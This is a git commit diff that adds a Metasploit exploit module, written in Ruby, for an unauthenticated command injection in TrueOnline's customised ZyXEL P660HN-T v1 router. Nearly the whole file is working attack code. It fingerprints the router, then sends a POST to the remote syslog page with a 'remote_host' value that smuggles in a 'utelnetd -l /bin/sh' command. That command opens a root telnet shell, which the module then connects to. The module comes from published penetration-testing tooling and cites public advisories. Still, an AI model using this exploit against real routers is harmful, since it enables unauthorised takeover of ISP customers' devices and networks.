Land rapid7#7821, Command Injection Exploit for TrueOnline ZyXEL P660HN

wwebb-r7 · wwebb-r7 · commit f167358540c0 · 2017-01-31T11:28:46.000-06:00
diff --git a/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb b/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection',
+      'Description'    => %q{
+        TrueOnline is a major ISP in Thailand, and it distributes a customised version of
+        the ZyXEL P660HN-T v1 router. This customised version has an unauthenticated command
+        injection vulnerability in the remote log forwarding page.
+        This module was tested in an emulated environment, as the author doesn't have access to the
+        Thai router any more. Any feedback should be sent directly to the module's author, as well as
+        to the Metasploit project.
+        There are other language strings in the firmware, so it is likely that this firmware is not only
+        distributed in Thailand. Other P660HN-T v1 in other countries might be vulnerable too.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'References'     =>
+        [
+          ['URL', 'http://seclists.org/fulldisclosure/2017/Jan/40'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt'],
+          ['URL', 'https://blogs.securiteam.com/index.php/archives/2910']
+        ],
+      'Targets'        =>
+        [
+          [ 'P660HN-T v1', {}],
+        ],
+      'Privileged'     => true,
+      'Arch'           => ARCH_CMD,
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'DisclosureDate'  => 'Dec 26 2016',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptInt.new('TelnetPort', [true, "Telnet port we're going to use", 9999]),
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi!({
+      'uri'     => '/cgi-bin/authorize.asp',
+      'method'  => 'GET'
+    })
+    if res && res.body =~ /ZyXEL P-660HN-T1A/
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit router...")
+    send_request_cgi({
+      'uri'     => '/cgi-bin/ViewLog.asp',
+      'method'  => 'POST',
+      'vars_post' => {
+        'remote_submit_Flag' => '1',
+        'remote_syslog_Flag' => '1',
+        'RemoteSyslogSupported' => '1',
+        'remote_host' => ";utelnetd -l /bin/sh -p #{datastore['TelnetPort']} -d;#",
+        'remoteSubmit' => 'Save'
+      }
+    })
+
+    sleep 5
+
+    begin
+      ctx = { 'Msf' => framework, 'MsfExploit' => self }
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['TelnetPort'], 'Context' => ctx, 'Timeout' => 10 })
+      if not sock.nil?
+        print_good("#{peer} - Success, shell incoming!")
+        return handler(sock)
+      end
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      sock.close if sock
+    end
+
+    fail_with(Failure::Unknown, "#{peer} - Failed to exploit router.")
+  end
+end
